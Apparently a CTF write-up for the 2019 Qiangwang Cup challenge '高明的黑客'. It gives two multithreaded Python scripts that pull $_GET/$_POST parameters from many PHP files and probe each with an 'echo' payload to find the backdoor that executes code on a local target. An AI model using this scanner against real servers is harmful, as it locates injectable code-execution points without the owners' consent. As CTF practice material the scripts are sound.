[强网杯 2019]高明的黑客
import re
import requests
import os
import threading
import time
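file_path = "/Users/xxx/Desktop/src"  # local copy of the challenge's PHP sources
url = "http://127.0.0.1/xxx/src/"  # where the same files are served; trailing slash is required
requests.adapters.DEFAULT_RETRIES = 5  # retry dropped connections instead of silently losing a probe
# Probe regular files only: os.listdir() also returns sub-directories, and
# open() on one of those would raise inside a worker thread.
filenames = [
    name for name in os.listdir(file_path)
    if os.path.isfile(os.path.join(file_path, name))
]
# One Session shared by every worker thread.
# NOTE(review): requests does not promise Session is thread-safe; fine for a
# local CTF target, confirm before reusing this pattern elsewhere.
s = requests.Session()
# NOTE(review): requests.Session has no documented keep_alive attribute, so
# this assignment is most likely a no-op — verify if connection reuse matters.
s.keep_alive = False
a = 0  # set to 1 by req_rce() on the first hit; main() stops waiting on threads once it is set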
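def req_rce(url, filename, para, type, session=None, timeout=10):
    """Probe one request parameter of one PHP file for code execution.

    Sends ``echo Tkitn;`` as the value of *para*.  That statement prints the
    marker whether it lands in PHP ``eval()`` or in a shell, so the marker
    showing up in the response is taken as execution.

    Args:
        url: Base URL the sources are served from (with trailing slash).
        filename: PHP file under *url* to request.
        para: Parameter name found in that file's source.
        type: ``"GET"`` or ``"POST"``; any other value sends nothing.
        session: Object with ``get``/``post`` like ``requests.Session``;
            defaults to the module-level ``s``.
        timeout: Per-request timeout in seconds, so a hung target cannot
            block a worker thread forever.

    Returns:
        True on a hit, False otherwise — including on connection errors,
        which are printed rather than raised so one bad request does not
        kill the thread.

    Side effects: prints ``TYPE/filename?para`` and sets the module-level
    flag ``a`` to 1 on a hit.
    """
    global a
    marker = "Tkitn"
    payload = "echo " + marker + ";"
    sess = s if session is None else session
    target = url + filename

    try:
        if type == "GET":
            # params= percent-encodes the value; the hand-built
            # "?para=echo Tkitn;" left the space and ';' for requests to fix up.
            resp = sess.get(target, params={para: payload}, timeout=timeout)
        elif type == "POST":
            resp = sess.post(target, data={para: payload}, timeout=timeout)
        else:
            return False
    except OSError as exc:  # requests' RequestException subclasses IOError/OSError
        print("[error] " + type + "/" + filename + "?" + para + ": " + str(exc))
        return False

    body = resp.text
    # A page that merely reflects the raw parameter also contains "Tkitn",
    # because the payload itself contains it.  Count marker occurrences that
    # are not part of a verbatim "echo Tkitn;" so plain reflection is not
    # reported as execution.
    if body.count(marker) > body.count(payload):
        print(type + "/" + filename + "?" + para)
        a = 1
        return True
    return False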
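def getpara(file, base_dir=None, base_url=None, probe=None):
    """Find every ``$_GET[...]`` / ``$_POST[...]`` parameter in one PHP source file and probe each.

    Args:
        file: File name relative to *base_dir*.
        base_dir: Directory holding the sources; defaults to module ``file_path``.
        base_url: Base URL to probe; defaults to module ``url``.
        probe: Callable ``(url, filename, para, type)``; defaults to ``req_rce``.

    Returns:
        The ``(type, para)`` pairs that were probed, in first-seen order,
        each distinct pair once.
    """
    directory = file_path if base_dir is None else base_dir
    target_url = url if base_url is None else base_url
    request = req_rce if probe is None else probe
    # finditer (not search) so a line holding several parameters yields all
    # of them; [^'"]* instead of greedy .* so the name stops at its own quote;
    # both quote styles accepted.
    pattern = re.compile(r"\$_(GET|POST)\[(['\"])([^'\"]*)\2\]")
    found = []
    seen = set()
    # errors="replace": a stray non-UTF-8 byte would otherwise raise and
    # silently kill the worker thread.
    with open(os.path.join(directory, file), "r", encoding="utf-8", errors="replace") as fh:
        for line in fh:
            for m in pattern.finditer(line):
                pair = (m.group(1), m.group(3))
                if pair not in seen:  # the same parameter often appears several times per file
                    seen.add(pair)
                    found.append(pair)
    for type_, para in found:
        request(target_url, file, para, type_)
    return found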
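def main():
    """Probe every file in *filenames* concurrently and print elapsed time.

    One daemon worker thread per file runs getpara().  Reads the module
    flag ``a``: once req_rce() sets it, main() stops joining and returns,
    and the remaining daemon threads die with the process.
    NOTE(review): this is one thread (and connection) per file at once —
    thousands for a large source tree; fine against a local target.
    """
    start_time = time.time()
    print("[start]程序开始:" + str(start_time))
    workers = [
        threading.Thread(target=getpara, args=(file_name,), daemon=True)
        for file_name in filenames
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        if a:  # first hit already reported; no need to wait for the rest
            break
        worker.join()
    end_time = time.time()
    print("[end]程序结束:用时(秒):" + str(end_time - start_time))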
# Run the scan only when executed directly, not when imported.
if __name__ == '__main__':
    main()
脚本2（写文件版）— Script 2: the same scanner, but it records each hit in flag.txt instead of only printing it.
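import re
import requests
import os
import threading
import time

file_path = "/Users/xubowen/Desktop/src"  # local copy of the challenge's PHP sources
url = "http://127.0.0.1/Tkitn/src/"  # where the same files are served; trailing slash is required
requests.adapters.DEFAULT_RETRIES = 5  # retry dropped connections instead of silently losing a probe
# Probe regular files only: os.listdir() also returns sub-directories, and
# open() on one of those would raise inside a worker thread.
filenames = [
    name for name in os.listdir(file_path)
    if os.path.isfile(os.path.join(file_path, name))
]
# One Session shared by every worker thread.
# NOTE(review): requests does not promise Session is thread-safe; fine for a
# local CTF target, confirm before reusing this pattern elsewhere.
s = requests.Session()
# NOTE(review): requests.Session has no documented keep_alive attribute, so
# this assignment is most likely a no-op.
s.keep_alive = False

RESULT_FILE = "flag.txt"
_result_lock = threading.Lock()  # worker threads append to RESULT_FILE concurrently


def setflag(flag):
    """Return *flag* unchanged; kept only because req_rce() calls it (no side effect)."""
    return flag


def _record_hit(flag):
    """Append one hit line to RESULT_FILE.

    Appending under a lock replaces the original open(..., "w") per hit,
    which let a later hit overwrite an earlier one.  main() truncates the
    file once per run so results do not accumulate across runs.
    """
    with _result_lock:
        with open(RESULT_FILE, "a", encoding="utf-8") as fh:
            fh.write(flag + "\n")


def req_rce(url, filename, para, type, session=None, timeout=10):
    """Probe one request parameter of one PHP file for code execution.

    Sends ``echo Tkitn;`` as the value of *para*; the marker appearing in
    the response (beyond mere reflection of the payload) is taken as
    execution, and the hit ``TYPE/filename?para`` is written to RESULT_FILE.

    Args:
        url: Base URL the sources are served from (with trailing slash).
        filename: PHP file under *url* to request.
        para: Parameter name found in that file's source.
        type: ``"GET"`` or ``"POST"``; any other value sends nothing.
        session: Object with ``get``/``post`` like ``requests.Session``;
            defaults to the module-level ``s``.
        timeout: Per-request timeout in seconds so a hung target cannot
            block a worker thread forever.

    Returns:
        True on a hit, False otherwise (connection errors are printed, not
        raised, so one bad request does not kill the thread).
    """
    marker = "Tkitn"
    payload = "echo " + marker + ";"
    sess = s if session is None else session
    target = url + filename

    try:
        if type == "GET":
            # params= percent-encodes the value instead of hand-building the query string.
            resp = sess.get(target, params={para: payload}, timeout=timeout)
        elif type == "POST":
            resp = sess.post(target, data={para: payload}, timeout=timeout)
        else:
            return False
    except OSError as exc:  # requests' RequestException subclasses IOError/OSError
        print("[error] " + type + "/" + filename + "?" + para + ": " + str(exc))
        return False

    body = resp.text
    # The payload itself contains "Tkitn", so a page that only reflects the
    # raw parameter would match a plain substring test.  Count marker
    # occurrences that are not part of a verbatim "echo Tkitn;".
    if body.count(marker) > body.count(payload):
        flag = type + "/" + filename + "?" + para
        _record_hit(flag)
        setflag(0)
        return True
    print("running")
    return False


def getpara(file, base_dir=None, base_url=None, probe=None):
    """Find every ``$_GET[...]`` / ``$_POST[...]`` parameter in one PHP source file and probe each.

    Args:
        file: File name relative to *base_dir*.
        base_dir: Directory holding the sources; defaults to module ``file_path``.
        base_url: Base URL to probe; defaults to module ``url``.
        probe: Callable ``(url, filename, para, type)``; defaults to ``req_rce``.

    Returns:
        The ``(type, para)`` pairs probed, in first-seen order, each once.
    """
    directory = file_path if base_dir is None else base_dir
    target_url = url if base_url is None else base_url
    request = req_rce if probe is None else probe
    # finditer so a line holding several parameters yields all of them;
    # [^'"]* instead of greedy .* so the name stops at its own quote.
    pattern = re.compile(r"\$_(GET|POST)\[(['\"])([^'\"]*)\2\]")
    found = []
    seen = set()
    # errors="replace": a stray non-UTF-8 byte would otherwise raise and
    # silently kill the worker thread.
    with open(os.path.join(directory, file), "r", encoding="utf-8", errors="replace") as fh:
        for line in fh:
            for m in pattern.finditer(line):
                pair = (m.group(1), m.group(3))
                if pair not in seen:
                    seen.add(pair)
                    found.append(pair)
    for type_, para in found:
        request(target_url, file, para, type_)
    return found


def main():
    """Probe every file in *filenames* concurrently and print elapsed time.

    Truncates RESULT_FILE first so each run starts clean; hits are appended
    by req_rce() as they are found.  One worker thread per file, all joined
    (no early exit in this variant).
    NOTE(review): that is thousands of simultaneous connections for a
    large source tree; fine against a local target.
    """
    open(RESULT_FILE, "w", encoding="utf-8").close()
    start_time = time.time()
    print("[start]程序开始:" + str(start_time))
    workers = [
        threading.Thread(target=getpara, args=(file_name,))
        for file_name in filenames
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    end_time = time.time()
    print("[end]程序结束:用时(秒):" + str(end_time - start_time))


# Run the scan only when executed directly, not when imported.
if __name__ == '__main__':
    main()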